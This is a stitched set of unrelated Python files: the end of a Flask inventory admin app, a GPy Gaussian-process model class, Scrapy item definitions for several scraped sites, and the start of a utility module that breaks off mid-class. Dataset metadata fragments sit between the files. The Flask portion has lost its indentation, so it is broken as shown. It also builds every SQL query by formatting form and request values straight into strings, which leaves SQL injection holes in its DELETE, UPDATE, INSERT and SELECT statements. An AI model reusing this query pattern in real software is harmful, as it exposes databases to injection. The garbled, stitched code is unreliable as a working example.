removeFromLogs = "DELETE FROM Logs WHERE item='{}';".format(iid)
print "SQL: %s" % removeFromLogs
cursor.execute(removeFromLogs)
conn.commit()
removeFromPriceChange = "DELETE FROM PriceChange WHERE item='{}';".format(iid)
print "SQL: %s" % removeFromPriceChange
cursor.execute(removeFromPriceChange)
conn.commit()
removeFromTagItems = "DELETE FROM TagItems WHERE iid='{}';".format(iid)
print "SQL: %s" % removeFromTagItems
cursor.execute(removeFromTagItems)
conn.commit()
try:
os.remove("static/img/items/"+picture)
print("ADMIN: Item successfuly deleted!")
except Exception as e:
print("DELETE THUMBNAIL: %s" % e)
flash('Item deleted!', 'success')
except IndexError:
flash("Item not found!", "warning")
except Exception as e:
print("DELETE ITEM: %s" % e)
flash('Couldn\'t delete item', 'danger')
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Existing Items to New Locations form ----------------------
elif request.form['name-form'] =='form4':
if form4.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
itemname = form4.itemname.data
tid = form4.tid.data
amt = form4.qty.data
try:
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT iid FROM Ascott_InvMgmt.Items WHERE name = '{}';".format(itemname))
iid = cursor.fetchall()[0][0]
# TODO: string parameterisation
# cursor = mysql.connect().commit();
# Check if item is already assigned to tag
cursor.execute("SELECT * FROM Ascott_InvMgmt.TagItems WHERE iid={} AND tag={};".format(iid, tid))
rowExists = cursor.fetchall()
if rowExists:
cursor.execute("UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(amt, iid, tid))
conn.commit()
flash("Item already in location. Qty updated.", "success")
else:
query = "INSERT INTO Ascott_InvMgmt.TagItems VALUES ({},{},{}); COMMIT;".format(iid,tid,amt)
print(query)
cursor.execute(query)
flash("Added Item to Location!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------ Transfer Items Form ----------------------
elif request.form['name-form'] =='transferItemForm':
if transferItemForm.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
print("form validated")
item = transferItemForm.iname.data
tagOld = transferItemForm.tagOld.data
tagNew = transferItemForm.tagNew.data
qty = transferItemForm.qty.data
print(item)
print(tagOld)
print(tagNew)
print(qty)
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "SELECT iid FROM Ascott_InvMgmt.Items WHERE name = '{}';".format(item)
print(query)
cursor.execute(query)
iid = cursor.fetchall()[0][0]
query = "SELECT * FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
print(query)
cursor.execute(query)
row = cursor.fetchall()[0]
# TODO: string parameterisation
queryOut = ""
queryIn = ""
message = ""
# if user only wants to transfer some of the items over
                    if qty is not None:
if qty == 0:
flash("Qty input was 0, none transferred.", "warning")
return redirect(url_for('admin', lang_code=get_locale()))
print(row)
# check if there are enough items at the old location to transfer the stated qty.
if qty > row[2]:
raise InsufficientQtyError("Not enough in store to transfer!")
# if sufficient items, deduct items from old location.
qty_left = row[2] - qty
if qty_left == 0:
queryOut = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
else:
queryOut = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(qty_left, iid, tagOld)
# if user wants to transfer all
else:
qty = row[2]
queryOut = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
print(queryOut)
# Add the items to the new location.
# Check if there are already instances of the item at the new location.
query = "SELECT * FROM Ascott_InvMgmt.TagItems WHERE iid={} AND tag={};".format(iid, tagNew)
print(query)
cursor = mysql.connect().cursor()
cursor.execute(query)
rowExists = cursor.fetchall()
if rowExists:
print('row exists!')
# Update the qty instead of creating a new row.
newQty = rowExists[0][2] + qty
queryIn = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(newQty, iid, tagNew)
message = "Item already in location, updated qty."
else:
print('row does not exist')
# Create a new row.
queryIn = "INSERT INTO Ascott_InvMgmt.TagItems VALUES ({},{},{});".format(iid, tagNew, qty)
message = "Transferred item to location!"
print(queryIn)
flash(message, "success")
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(queryIn + queryOut + "COMMIT;")
except InsufficientQtyError as e:
flash(e.args[0], "danger")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Remove Item From Tag Form ----------------------
elif request.form['name-form'] =='removeFromTag':
print('form received')
item = request.form["iid"]
tag = request.form["tid"]
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(item, tag)
print(query)
cursor.execute(query)
conn.commit()
flash("Item removed from tag!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Tag form ----------------------
# TODO: Change form to get appropriate values
elif request.form['name-form'] =='form3':
if form3.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
tname = form3.tname.data
oldLocation = form3.location.data
newLocation = form3.newLocation.data
remarks = form3.remarks.data
if newLocation:
location = newLocation
else:
location = oldLocation
conn = mysql.connect()
cursor = conn.cursor()
try:
# TODO: string parameterisation
query = "INSERT INTO TagInfo (`tname`, `storeroom`, `remarks`) VALUES ('{}','{}','{}');".format(tname, location, remarks)
print(query)
cursor.execute(query)
conn.commit()
flash("New Tag Added!", "success")
except:
flash("Couldn't add tag.", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Delete Tag form ----------------------
elif request.form['name-form'] =='deleteTag':
print('form received')
tid = request.form["tid"]
try:
                cursor = mysql.connect().cursor()
cursor.execute("SELECT * FROM TagItems WHERE tag={};".format(tid))
tagRows = cursor.fetchone()
if tagRows:
raise ContainsItemsError("Can't delete tag because it has items assigned to it. Please remove the items from the tag before deleting the tag.")
else:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM TagInfo WHERE tid={};".format(tid)
print(query)
cursor.execute(query)
conn.commit()
flash("Tag deleted!", "success")
except ContainsItemsError as e:
flash(e.args[0], "danger")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
@application.route('/<lang_code>/dashboard')
def dashboard():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
i = getInventoryLow()
l = getDailyLogs()
print(l)
# l = getLogs()
return render_template('dashboard.html',
role=session['role'],
user=session['username'],
items = i,
logs = l)
@application.route('/<lang_code>/inventory')
def inventory():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
cursor = mysql.connect().cursor()
cursor.execute("SELECT DISTINCT category FROM Items;")
cats = cursor.fetchall()
itemsByCat = []
for cat in cats:
itemsByCat.append({cat[0].encode('ascii'):[]})
data = inventoryQuick(None)
for i in data:
for cat in itemsByCat:
if cat.keys()[0] == i['category']:
cat[i['category']].append(i)
print(i['category'])
# get list of all locations to display
location_query = "SELECT DISTINCT TagInfo.storeroom FROM TagItems INNER JOIN TagInfo ON TagItems.tag = TagInfo.tid;"
cursor = mysql.connect().cursor()
cursor.execute(location_query)
data = cursor.fetchall()
locations = []
for i in data:
locations.append(i[0].encode('ascii'))
return render_template('inventory.html',
user = session['username'],
role = session['role'],
categories = itemsByCat,
num_cat = len(itemsByCat),
locations = locations)
@application.route('/<lang_code>/inventory/<int:iid>', methods=['GET', 'POST'])
def item(iid):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
if request.method == 'POST':
print "STOCK UPDATE: content_type - ", request.content_type
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
user = session['username']
# form data
tid = int(request.form.get('location'))
qty = int(request.form.get('qty'))
action = request.form.get('action')
print("STOCK UPDATE: Form received - (iid: %s ,tid: %s, qty: %s , action: %s, user: %s)" %
(iid, tid, qty, action, user))
try:
# process changes
updateSuccess = stockUpdate(iid, tid, qty, user, action, now)
flash(updateSuccess[0], updateSuccess[1])
return redirect(url_for("item", lang_code=get_locale(), iid=iid))
except:
flash('Oops! Something went wrong :(', 'danger')
return redirect(url_for("item", lang_code=get_locale(), iid=iid))
cursor = mysql.connect().cursor()
query = "SELECT name, category, picture, tag, qty_left, reorder_pt, in_out_ratio, out_by, price FROM Ascott_InvMgmt.view_item_locations WHERE iid = {};".format(iid)
cursor.execute(query)
data = cursor.fetchall()
# d = [[s.encode('ascii') for s in list] for list in data]
r = []
for i in data:
cursor.execute("SELECT tname, storeroom FROM TagInfo WHERE tid={};".format(i[3]))
taginfo = cursor.fetchall()[0]
tname = taginfo[0].encode('ascii')
storeroom = taginfo[1].encode('ascii')
r.append({"name": i[0].encode('ascii'),
"category": i[1].encode('ascii'),
"picture": i[2].encode('ascii'),
"tag": tname,
"location": storeroom,
"qty_left": i[4],
"reorder": i[5],
"batch_size": i[6],
"unit": i[7].encode('ascii'),
"price": round(i[8],2),
"tid": i[3],
"iid": iid})
cursor.execute("SELECT new_price, date_effective FROM Ascott_InvMgmt.PriceChange WHERE item = '{}';".format(iid))
price = cursor.fetchall()
pricechanges = []
if price == ():
pricechanges.append({
"iid":iid,
"new_price": 0,
"date_effective": 0})
else:
for item in price:
pricechanges.append({
"iid":iid,
"new_price": item[0],
"date_effective": item[1]})
    try:
        return render_template('item.html', item = r, pricechanges = pricechanges)
    except:
        return render_template('item.html', item = r, pricechanges = None)
@application.route('/<lang_code>/review/<category>')
def category(category):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
category = category
itemtype = getAllInventory(category)
return render_template('category.html',
category=category,
itemtype=itemtype,
role = session['role'],
user = session['username'])
@application.route('/<lang_code>/storeroom/<storeroom>')
def storeroom(storeroom):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
cursor = mysql.connect().cursor()
query1="SELECT tid FROM TagInfo WHERE storeroom='{}';".format(storeroom)
cursor.execute(query1)
tags = cursor.fetchall()
items = {}
for t in tags:
tagid=t[0]
cursor.execute("SELECT iid, name, picture, reorder_pt, qty_left, out_by FROM view_item_locations WHERE tag='{}';".format(tagid))
data = cursor.fetchall()
for d in data:
if d[0] in items.keys():
items[d[0]]['qty_left'] += d[4]
else:
items[d[0]] = {
'name':d[1].encode('ascii'),
'picture':d[2].encode('ascii'),
'reorder_pt':d[3],
'qty_left':d[4],
'unit':d[5].encode('ascii')
}
print(t)
print(tags)
return render_template('storeroom.html',
storename = storeroom,
items = items,
user = session['username'],
role = session['role'])
@application.route('/<lang_code>/logs')
def logs():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
logs=getAllLogs()
# names=getUniqueNames()
# items=getUniqueItems()
return render_template('logs.html',
logs=logs,
role = session['role'],
user = session['username'])
# names=names, items=items)
@application.route('/<lang_code>/scan')
def scanner():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
return render_template('scanner.html')
# RA shelf view
@application.route('/<lang_code>/shelves/<tag_id>', methods=['GET', 'POST'])
def shelf(tag_id):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
cursor = mysql.connect().cursor()
items = inventoryQuick(tag_id)
cursor.execute("""SELECT tname FROM TagInfo WHERE tid={};""".format(tag_id))
tagName = cursor.fetchone()[0].encode('ascii')
if request.method == 'POST':
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
form_data = request.form
print(form_data)
user = session['username']
try:
conn = mysql.connect()
cursor = conn.cursor()
for item, [inputQty, action, tag] in form_data.iterlists():
updateSuccess = stockUpdate(item, tag, int(inputQty), user, action, now)
flash(updateSuccess[0], updateSuccess[1])
return redirect(url_for("scanner", lang_code=get_locale()))
except Exception as e:
print("CART ERROR: %s" % e)
flash('Oops! Something went wrong :(', 'danger')
return render_template('shelf.html', things=items,
role = session['role'],
user = session['username'],
location = tag_id,
tagName = tagName)
@application.route('/logout')
def logout():
session.clear()
return redirect(url_for("login", lang_code=get_locale()))
@application.errorhandler(404)
def page_not_found(e):
return render_template('error/404.html', error=e), 404
@application.errorhandler(500)
def internal_server_error(e):
return render_template('error/500.html', error=e), 500
## testing
if __name__ == '__main__':
application.run()
``` |
{
"source": "jinjiaodawang/bayesmark",
"score": 2
} |
#### File: models/gp/gpy_mlp.py
```python
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the MIT License for more details.
from ..base_model import BaseModel
from ..layers import EmbTransform, OneHotTransform
from ..scalers import TorchMinMaxScaler, TorchStandardScaler
import GPy
import torch
import torch.nn as nn
import numpy as np
from torch import Tensor, FloatTensor, LongTensor
class GPyMLPGP(BaseModel):
"""
    Input warped GP model implemented using GPy instead of GPyTorch.
    Why GPy: it provides input warping out of the box.
"""
def __init__(self, num_cont, num_enum, num_out, **conf):
super().__init__(num_cont, num_enum, num_out, **conf)
if num_enum > 0:
self.one_hot = OneHotTransform(self.conf['num_uniqs'])
self.xscaler = TorchMinMaxScaler((-1, 1))
self.yscaler = TorchStandardScaler()
self.verbose = self.conf.get('verbose', False)
self.num_epochs = self.conf.get('num_epochs', 200)
def fit_scaler(self, Xc : FloatTensor, y : FloatTensor):
if Xc is not None and Xc.shape[1] > 0:
self.xscaler.fit(Xc)
self.yscaler.fit(y)
def trans(self, Xc : Tensor, Xe : Tensor, y : Tensor = None):
if Xc is not None and Xc.shape[1] > 0:
Xc_t = self.xscaler.transform(Xc)
else:
Xc_t = torch.zeros(Xe.shape[0], 0)
if Xe is None or Xe.shape[1] == 0:
Xe_t = torch.zeros(Xc.shape[0], 0)
else:
Xe_t = self.one_hot(Xe.long())
Xall = torch.cat([Xc_t, Xe_t], dim = 1)
if y is not None:
y_t = self.yscaler.transform(y)
return Xall.numpy(), y_t.numpy()
return Xall.numpy()
def fit(self, Xc : FloatTensor, Xe : LongTensor, y : LongTensor):
self.fit_scaler(Xc, y)
X, y = self.trans(Xc, Xe, y)
kern = GPy.kern.src.mlp.MLP(input_dim = X.shape[1], ARD = True)
self.gp = GPy.models.GPRegression(X, y, kern)
self.gp.kern.variance = np.var(y)
self.gp.kern.lengthscale = np.std(X, axis = 0)
self.gp.likelihood.variance = 1e-2 * np.var(y)
self.gp.kern.variance.set_prior(GPy.priors.Gamma(0.5, 0.5))
self.gp.likelihood.variance.set_prior(GPy.priors.LogGaussian(-4.63, 0.5))
self.gp.optimize_restarts(max_iters = self.num_epochs, messages = self.verbose, num_restarts = 10)
print(self.gp.likelihood.variance, flush = True)
print(self.gp.likelihood.variance[0], flush = True)
return self
def predict(self, Xc : FloatTensor, Xe : LongTensor) -> (FloatTensor, FloatTensor):
Xall = self.trans(Xc, Xe)
py, ps2 = self.gp.predict(Xall)
mu = self.yscaler.inverse_transform(FloatTensor(py).view(-1, 1))
var = (self.yscaler.std**2 * FloatTensor(ps2).view(-1, 1)).clamp(min = 1e-6)
return mu, var
def sample_f(self):
raise RuntimeError('Thompson sampling is not supported for GP, use `sample_y` instead')
@property
def noise(self):
var_normalized = self.gp.likelihood.variance[0]
return (var_normalized * self.yscaler.std**2).view(self.num_out)
@property
def support_ts(self):
return False
@property
def support_grad(self):
return False
@property
def support_multi_output(self):
return False
@property
def support_warm_start(self) ->bool:
return False
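# Minimal usage sketch (illustrative only; assumes the surrounding package provides BaseModel
# and the scalers, and that GPy/torch are installed — shapes and kwargs here are made up):
if __name__ == '__main__':
    Xc = torch.randn(32, 3)                         # 32 points, 3 continuous dims, no enums
    y = Xc.sum(dim=1, keepdim=True) + 0.05 * torch.randn(32, 1)
    model = GPyMLPGP(num_cont=3, num_enum=0, num_out=1, num_epochs=50)
    model.fit(Xc, None, y)                          # Xe is None since num_enum == 0
    mu, var = model.predict(Xc, None)               # posterior mean / variance, each (32, 1)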
``` |
{
"source": "jinjie412/ArticleSpider",
"score": 3
} |
#### File: ArticleSpider/ArticleSpider/items.py
```python
import datetime
import re
from ArticleSpider.settings import SQL_DATETIME_FORMAT
from ArticleSpider.utils.common import extract_num, extract_num_include_dot
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst, MapCompose, Join
from w3lib.html import remove_tags
class ArticlespiderItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
# Convert a date string into a date object
def date_convert(value):
try:
create_date = datetime.datetime.strptime(value, "%Y/%m/%d").date()
except Exception as e:
create_date = datetime.datetime.now().date()
return create_date
# Extract the first number found in a string
def get_nums(value):
match_re = re.match(".*?(\d+).*", value)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
return nums
# Drop extracted tag values that are actually the comment count
def remove_comment_tags(value):
if "评论" in value:
return ""
else:
return value
# Return the value unchanged (identity processor)
def return_value(value):
return value
# Replace empty/None values with a placeholder
def exclude_none(value):
if value:
return value
else:
value = "无"
return value
# Custom ItemLoader whose default output processor takes the first value
class ArticleItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class FangItem(scrapy.Item):
id = scrapy.Field()
name = scrapy.Field(
)
price = scrapy.Field()
address = scrapy.Field()
tags = scrapy.Field(
)
crawl_time = scrapy.Field()
def get_insert_sql(self):
insert_sql = """
insert into fang(id, name, price,address, tags, crawl_time
)
VALUES (%s, %s, %s,%s, %s, %s) ON DUPLICATE KEY UPDATE price=VALUES(price)
"""
crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
self["crawl_time"] = crawl_time
self["name"] = self["name"].strip()
match_hans5 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans4 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"], re.DOTALL)
match_hans3 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans2 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans1 = re.match(
".*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
if match_hans5:
self["tags"] = match_hans5.group(1) + "," + match_hans5.group(2) + match_hans5.group(
3) + "," + match_hans5.group(4) + "," + match_hans5.group(5)
elif match_hans4:
self["tags"] = match_hans4.group(1) + "," + match_hans4.group(
2) + match_hans4.group(3) + "," + match_hans4.group(4)
elif match_hans3:
self["tags"] = match_hans3.group(
1) + "," + match_hans3.group(2) + "," + match_hans3.group(3)
elif match_hans2:
self["tags"] = match_hans2.group(
1) + "," + match_hans2.group(2)
elif match_hans1:
self["tags"] = match_hans1.group(1)
else:
self["tags"] = ""
params = (
self["id"],
self["name"],
self["price"],
self["address"],
self["tags"],
self["crawl_time"])
return insert_sql, params
class JobBoleArticleItem(scrapy.Item):
title = scrapy.Field()
create_date = scrapy.Field(
# input_processor=MapCompose(date_convert),
)
url = scrapy.Field()
url_object_id = scrapy.Field()
front_image_url = scrapy.Field(
        # Override the default TakeFirst output processor so that front_image_url stays a list.
output_processor=MapCompose(return_value)
)
front_image_path = scrapy.Field()
praise_nums = scrapy.Field(
# input_processor=MapCompose(get_nums)
)
comment_nums = scrapy.Field(
input_processor=MapCompose(get_nums)
)
fav_nums = scrapy.Field(
input_processor=MapCompose(get_nums)
)
tags = scrapy.Field(
input_processor=MapCompose(remove_comment_tags),
        # Join the list of tags with commas
output_processor=Join(",")
)
content = scrapy.Field()
crawl_time = scrapy.Field()
def make_data_clean(self):
front_image_url = ""
# content = remove_tags(self["content"])
self["crawl_time"] = datetime.datetime.now(
).strftime(SQL_DATETIME_FORMAT)
if self["front_image_url"]:
self["front_image_url"] = self["front_image_url"][0]
str = self["create_date"].strip().replace("·", "").strip()
self["create_date"] = datetime.datetime.strptime(
str, "%Y/%m/%d").date()
nums = 0
value = self["praise_nums"]
match_re = re.match(".*?(\d+).*", value)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
self["praise_nums"] = nums
def get_insert_sql(self):
insert_sql = """
insert into jobbole_article(title, url, url_object_id,create_date, fav_nums, front_image_url, front_image_path,
praise_nums, comment_nums, tags, content,crawl_time)
VALUES (%s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s,%s) ON DUPLICATE KEY UPDATE fav_nums=VALUES(fav_nums),praise_nums=VALUES(praise_nums),comment_nums=VALUES(comment_nums),crawl_time=VALUES(crawl_time)
"""
self.make_data_clean()
params = (
self["title"],
self["url"],
self["url_object_id"],
self["create_date"],
self["fav_nums"],
self["front_image_url"],
self["front_image_path"],
self["praise_nums"],
self["comment_nums"],
self["tags"],
self["content"],
self["crawl_time"]
)
return insert_sql, params
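# Illustrative sketch (not part of the spider code): each item builds its own SQL, so a generic
# MySQL pipeline can stay item-agnostic. The cursor/connection arguments are placeholders.
def _example_insert(cursor, connection, item):
    insert_sql, params = item.get_insert_sql()
    cursor.execute(insert_sql, params)
    connection.commit()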
class ZhihuQuestionItem(scrapy.Item):
    # Zhihu question item
zhihu_id = scrapy.Field()
topics = scrapy.Field()
url = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field(
input_processor=MapCompose(exclude_none),
)
answer_num = scrapy.Field()
comments_num = scrapy.Field()
watch_user_num = scrapy.Field()
click_num = scrapy.Field()
crawl_time = scrapy.Field()
def get_insert_sql(self):
        # SQL statement for inserting into the zhihu_question table
insert_sql = """
insert into zhihu_question(zhihu_id, topics, url, title, content, answer_num, comments_num,
watch_user_num, click_num, crawl_time
)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE content=VALUES(content), answer_num=VALUES(answer_num), comments_num=VALUES(comments_num),
watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num)
"""
zhihu_id = self["zhihu_id"][0]
topics = ",".join(self["topics"])
url = self["url"][0]
title = "".join(self["title"])
try:
content = "".join(self["content"])
except BaseException:
content = "无"
try:
answer_num = extract_num("".join(self["answer_num"]))
except BaseException:
answer_num = 0
comments_num = extract_num("".join(self["comments_num"]))
if len(self["watch_user_num"]) == 2:
watch_user_num = extract_num_include_dot(self["watch_user_num"][0])
click_num = extract_num_include_dot(self["watch_user_num"][1])
else:
watch_user_num = extract_num_include_dot(self["watch_user_num"][0])
click_num = 0
crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
params = (
zhihu_id,
topics,
url,
title,
content,
answer_num,
comments_num,
watch_user_num,
click_num,
crawl_time)
return insert_sql, params
class ZhihuAnswerItem(scrapy.Item):
    # Zhihu answer item
zhihu_id = scrapy.Field()
url = scrapy.Field()
question_id = scrapy.Field()
author_id = scrapy.Field()
content = scrapy.Field()
praise_num = scrapy.Field()
comments_num = scrapy.Field()
create_time = scrapy.Field()
update_time = scrapy.Field()
crawl_time = scrapy.Field()
author_name = scrapy.Field()
def get_insert_sql(self):
        # SQL statement for inserting into the zhihu_answer table
insert_sql = """
insert into zhihu_answer(zhihu_id, url, question_id, author_id, content, praise_num, comments_num,
create_time, update_time, crawl_time,author_name
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s)
ON DUPLICATE KEY UPDATE content=VALUES(content), comments_num=VALUES(comments_num), praise_num=VALUES(praise_num),
update_time=VALUES(update_time), author_name=VALUES(author_name)
"""
create_time = datetime.datetime.fromtimestamp(
self["create_time"]).strftime(SQL_DATETIME_FORMAT)
update_time = datetime.datetime.fromtimestamp(
self["update_time"]).strftime(SQL_DATETIME_FORMAT)
params = (
self["zhihu_id"], self["url"], self["question_id"],
self["author_id"], self["content"], self["praise_num"],
self["comments_num"], create_time, update_time,
self["crawl_time"].strftime(SQL_DATETIME_FORMAT),
self["author_name"],
)
return insert_sql, params
def remove_splash(value):
    # Strip the slashes from the job city field
return value.replace("/", "")
def handle_jobaddr(value):
addr_list = value.split("\n")
addr_list = [item.strip() for item in addr_list if item.strip() != "查看地图"]
return "".join(addr_list)
class LagouJobItemLoader(ItemLoader):
    # Custom ItemLoader that takes the first value by default
default_output_processor = TakeFirst()
class LagouJobItem(scrapy.Item):
    # Lagou.com job posting item
title = scrapy.Field()
url = scrapy.Field()
url_object_id = scrapy.Field()
salary_min = scrapy.Field()
salary_max = scrapy.Field()
job_city = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
work_years_min = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
work_years_max = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
degree_need = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
job_type = scrapy.Field()
publish_time = scrapy.Field()
job_advantage = scrapy.Field()
job_desc = scrapy.Field()
job_addr = scrapy.Field(
input_processor=MapCompose(remove_tags, handle_jobaddr),
)
company_name = scrapy.Field()
company_url = scrapy.Field()
tags = scrapy.Field(
input_processor=Join(",")
)
crawl_time = scrapy.Field()
crawl_update_time = scrapy.Field()
def get_insert_sql(self):
insert_sql = """
insert into lagou_job(title, url, url_object_id, salary_min, salary_max, job_city, work_years_min, work_years_max, degree_need,
job_type, publish_time, job_advantage, job_desc, job_addr, company_name, company_url,
tags, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE salary_min=VALUES(salary_min), salary_max=VALUES(salary_max), job_desc=VALUES(job_desc)
"""
match_obj1 = re.match("经验(\d+)-(\d+)年", self['work_years_min'])
match_obj2 = re.match("经验应届毕业生", self['work_years_min'])
match_obj3 = re.match("经验不限", self['work_years_min'])
match_obj4 = re.match("经验(\d+)年以下", self['work_years_min'])
match_obj5 = re.match("经验(\d+)年以上", self['work_years_min'])
if match_obj1:
self['work_years_min'] = match_obj1.group(1)
self['work_years_max'] = match_obj1.group(2)
elif match_obj2:
self['work_years_min'] = 0.5
self['work_years_max'] = 0.5
elif match_obj3:
self['work_years_min'] = 0
self['work_years_max'] = 0
elif match_obj4:
self['work_years_min'] = 0
self['work_years_max'] = match_obj4.group(1)
elif match_obj5:
            self['work_years_min'] = match_obj5.group(1)
            self['work_years_max'] = int(match_obj5.group(1)) + 100
else:
self['work_years_min'] = 999
self['work_years_max'] = 999
match_salary = re.match("(\d+)[Kk]-(\d+)[Kk]", self['salary_min'])
if match_salary:
self['salary_min'] = match_salary.group(1)
self['salary_max'] = match_salary.group(2)
else:
self['salary_min'] = 666
self['salary_max'] = 666
match_time1 = re.match("(\d+):(\d+).*", self["publish_time"])
match_time2 = re.match("(\d+)天前.*", self["publish_time"])
match_time3 = re.match("(\d+)-(\d+)-(\d+)", self["publish_time"])
if match_time1:
today = datetime.datetime.now()
hour = int(match_time1.group(1))
minutues = int(match_time1.group(2))
time = datetime.datetime(
today.year, today.month, today.day, hour, minutues)
self["publish_time"] = time.strftime(SQL_DATETIME_FORMAT)
elif match_time2:
days_ago = int(match_time2.group(1))
today = datetime.datetime.now() - datetime.timedelta(days=days_ago)
self["publish_time"] = today.strftime(SQL_DATETIME_FORMAT)
elif match_time3:
year = int(match_time3.group(1))
month = int(match_time3.group(2))
day = int(match_time3.group(3))
today = datetime.datetime(year, month, day)
self["publish_time"] = today.strftime(SQL_DATETIME_FORMAT)
else:
self["publish_time"] = datetime.datetime.now(
).strftime(SQL_DATETIME_FORMAT)
params = (
self["title"],
self["url"],
self["url_object_id"],
self["salary_min"],
self["salary_max"],
self["job_city"],
self["work_years_min"],
self["work_years_max"],
self["degree_need"],
self["job_type"],
self["publish_time"],
self["job_advantage"],
self["job_desc"],
self["job_addr"],
self["company_name"],
self["company_url"],
self["tags"],
self["crawl_time"].strftime(SQL_DATETIME_FORMAT),
)
return insert_sql, params
```
#### File: ArticleSpider/utils/common.py
```python
import re
__author__ = 'mtianyan'
__date__ = '2018/1/18 0018 03:52'
import hashlib
import collections
class OrderedSet(collections.OrderedDict, collections.MutableSet):
def update(self, *args, **kwargs):
if kwargs:
raise TypeError("update() takes no keyword arguments")
for s in args:
for e in s:
self.add(e)
def add(self, elem):
self[elem] = None
def discard(self, elem):
self.pop(elem, None)
def __le__(self, other):
return all(e in other for e in self)
def __lt__(self, other):
return self <= other and self != other
def __ge__(self, other):
return all(e in self for e in other)
def __gt__(self, other):
return self >= other and self != other
def __repr__(self):
